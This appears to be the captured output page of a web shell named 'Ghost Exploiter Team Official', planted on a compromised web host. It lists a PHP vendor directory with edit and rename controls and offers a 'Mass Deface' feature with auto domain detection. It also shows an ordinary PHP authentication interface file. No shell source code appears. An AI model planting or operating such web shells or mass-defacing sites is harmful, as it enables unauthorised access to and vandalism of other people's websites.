webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
php-http
/
message
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Authentication
--
ren
Builder
--
ren
Decorator
--
ren
Encoding
--
ren
Exception
--
ren
Formatter
--
ren
MessageFactory
--
ren
RequestMatcher
--
ren
Stream
--
ren
StreamFactory
--
ren
UriFactory
--
ren
Authentication.php
0.67KB
edt
ren
Cookie.php
10.983KB
edt
ren
CookieJar.php
4.369KB
edt
ren
CookieUtil.php
1.381KB
edt
ren
Exception.php
0.129KB
edt
ren
Formatter.php
0.988KB
edt
ren
RequestMatcher.php
0.657KB
edt
ren
filters.php
0.174KB
edt
ren
<?php namespace Http\Message; use Psr\Http\Message\RequestInterface; /** * Add authentication information to a PSR-7 Request. * * @author Márk Sági-Kazár <mark.sagikazar@gmail.com> */ interface Authentication { /** * Alter the request to add the authentication credentials. * * To do that, the implementation might use pre-stored credentials or do * separate HTTP requests to obtain a valid token. * * @param RequestInterface $request The request without authentication information * * @return RequestInterface The request with added authentication information */ public function authenticate(RequestInterface $request); }